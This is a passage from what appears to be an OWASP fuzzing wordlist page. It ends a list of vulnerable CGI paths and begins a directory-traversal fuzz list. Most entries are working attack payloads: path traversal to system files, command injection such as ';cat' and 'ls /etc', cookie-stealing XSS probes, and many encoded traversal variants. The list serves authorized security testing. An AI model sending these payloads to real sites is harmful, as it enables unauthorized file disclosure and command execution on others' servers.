php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
